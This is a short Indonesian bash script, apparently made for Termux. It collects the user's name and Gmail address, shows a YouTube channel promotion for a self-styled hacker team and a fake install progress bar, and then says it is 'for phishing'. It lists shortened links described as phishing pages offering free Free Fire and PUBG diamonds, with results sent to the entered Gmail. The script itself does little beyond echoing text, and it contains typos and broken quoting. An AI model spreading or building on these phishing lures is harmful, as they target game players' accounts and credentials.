#!/system/xbin/bash
#mau Recode izin dulu di Instagram Ridwan58aja
#Github:https://github.com/RidwanKechil
blu='\e[1;34m'
green='\e[1;32m'
purple='\[1;35m'
cyan='\e[1;36m'
red='\e[1;31m'
white='\e[1;37m'
yellow='\e[1;33m'
steep 0,01
echo
echo
clear

sleep 1
echo "\033[32;1m selamat datang siapa nama kamu?" #tulisankeluar
read nick #membaca tulisan
echo
echo
clear

sleep 1
echo "\033[32;1m Masukkan Gmail Kamu" #tulisankeluar
read gmail #membaca tulisan
echo
echo
clear

sleep 3
echo "\033[32;1m
#################################
Jangan lupa subs channel kami ~~~
#-subs. = Ridwan Kechil. ~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#Channel lainya siapa tau ada vidio yang
#kalian Cari cari subs juga
#Nama channel
•1. Ridwan Kechil
•2.ibad crack
•3.Mr Wahyu
#-Team=THEIMMORTALHACKER 04 #
#################################"
sleep 1
echo "SELAMAT BERGABUNG" $nick
echo "install dulu"
echo "##_10%"
sleep 2
echo "####_20%"
sleep 2
echo "######_30%"
sleep 2
echo "########_40%"
sleep 1
echo "##################_100%"
sleep 2
echo
echo
clear

sleep 2
echo "Baca Dulu Ya======>> "
sleep 2
echo "Script ini berfungsi untuk Phising"
sleep 2
echo "Phising game "
sleep 2
echo "Phising Diamond FF: https://bit.ly/3jSJFuS
sleep 1
echo "Phising Diamond PUBG: https://bit.ly/3jSJFuS
sleep 1
echo "Gmail penerimaan hasil " $gmail
